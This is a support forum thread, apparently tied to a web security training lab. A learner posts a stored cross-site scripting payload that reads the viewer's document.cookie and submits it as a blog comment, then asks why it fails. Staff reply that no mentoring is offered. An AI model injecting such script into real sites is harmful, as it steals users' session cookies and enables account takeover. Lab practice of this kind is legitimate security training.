Name is required.
Email address is required.
Invalid email address
Answer is required.
Exceeding max length of 5KB

Exploiting cross-site scripting to steal cookie

Dai D Sep 04, 2019 11:35AM UTC

I'm doing the lab without using Burp Collaborator, so i need to write some custom JavaScript to make a POST request to comment the cookie whenever a user views the comment. My code is as follow:


<script>
var cookie = document.cookie
var changeReq = new XMLHttpRequest();
changeReq.open('post', '/post/comment', true);
changeReq.send('csrf=xFqO8r8W2Qip7I1wkiCLgI2WcimCYbwB&postId=1&comment='+cookie+'&name=asdf&email=adsf%40adf&website=http%3A%2F%2Faffaf.com');
</script>

But it doesn't seem to work. I'm at a loss at how to test / verify it or how to change it. Could some one please advice?

Thanks


Liam Tai-Hogan Sep 04, 2019 03:52PM UTC Support Center agent

We don’t provide a mentoring service for the labs. This might be something we consider doing in future along with video based solutions.

The lab can be completed. Keep trying.


Post Your public answer

Your name
Your email address
Answer